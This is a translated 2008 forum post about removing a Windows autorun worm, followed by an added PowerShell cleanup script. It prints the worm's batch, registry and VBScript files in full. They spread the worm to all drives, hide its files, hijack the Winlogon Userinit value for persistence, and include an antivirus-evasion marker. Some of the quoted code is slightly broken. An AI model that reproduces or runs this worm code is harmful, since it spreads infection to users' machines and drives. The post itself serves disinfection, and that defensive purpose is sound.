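How to remove the new, extra-strong autorun virus:
Some viruses of this kind are more effectively removed by hand, for example this one:
It creates four files in the root directory of every drive: autorun.inf, autorun.reg, autorun.bat, auto.vbs. Unfortunately I lost the first file. Below is the virus's code, shared with everyone: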
autorun.bat
@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀
pen
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end
autorun.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
autorun.vbs
on error resume next
Set WshShell =CreateObject("WScript.Shell"
if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject"
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:" Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
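Removal method:
1. First remove the hidden attribute from the files.
2. Then go to the system32 directory and delete autorun.*
(* stands for the extensions bat, reg, inf, vbs)
3. Go to the root directory of every drive and delete the autorun.* files.
4. At this point you are basically done. To be more thorough, go into the registry and delete, one by one, the values listed in the autorun.reg file above! Then you're OK!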
[ This post was last edited by promised on 2008-5-1 18:02 ]
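
The four removal steps above as a PowerShell script, added here as an example and not part of the original post. It assumes the file names that appear in the posted scripts (including sxs.exe), restores Userinit to the Windows default instead of deleting the value, and only reports what it finds until `$DryRun` is set to `$false`.

```powershell
# Added example (not from the original post). Run from an elevated prompt.
# $DryRun = $true only reports; set it to $false to actually change anything.
$DryRun = $true

# File names taken from the scripts shown in the post.
$names = 'autorun.inf', 'autorun.reg', 'autorun.bat', 'autorun.vbs', 'sxs.exe'

# Steps 1-3: check system32 plus the root of every file-system drive.
$roots = @(Join-Path $env:SystemRoot 'system32')
$roots += Get-PSDrive -PSProvider FileSystem | ForEach-Object { $_.Root }

foreach ($root in $roots) {
    foreach ($name in $names) {
        $path = Join-Path $root $name
        if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
        Write-Output "found $path"
        if ($DryRun) { continue }
        # -Force is needed to open files marked hidden/system (step 1).
        (Get-Item -LiteralPath $path -Force).Attributes = 'Normal'
        Remove-Item -LiteralPath $path -Force
    }
}

# Step 4: undo the values written by autorun.reg.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$current  = (Get-ItemProperty -Path $winlogon).Userinit
if ($current -match 'autorun\.bat') {
    # Restore the Windows default rather than deleting the value:
    # userinit.exe is what starts the user's shell at logon.
    $default = (Join-Path $env:SystemRoot 'system32\userinit.exe') + ','
    Set-ItemProperty -Path $winlogon -Name Userinit -Value $default -WhatIf:$DryRun
}

$runOnce = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
if ((Get-ItemProperty -Path $runOnce).autorun -eq 'sxs.exe') {
    Remove-ItemProperty -Path $runOnce -Name autorun -WhatIf:$DryRun
}

# Make hidden and protected system files visible again in Explorer,
# so any leftover copies can be seen (a choice made for this example).
$adv = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
Set-ItemProperty -Path $adv -Name Hidden -Value 1 -WhatIf:$DryRun
Set-ItemProperty -Path $adv -Name ShowSuperHidden -Value 1 -WhatIf:$DryRun
```

Run it once with `$DryRun = $true` and review the "found" lines before switching to `$false`, since a legitimate autorun.inf on vendor media would also match.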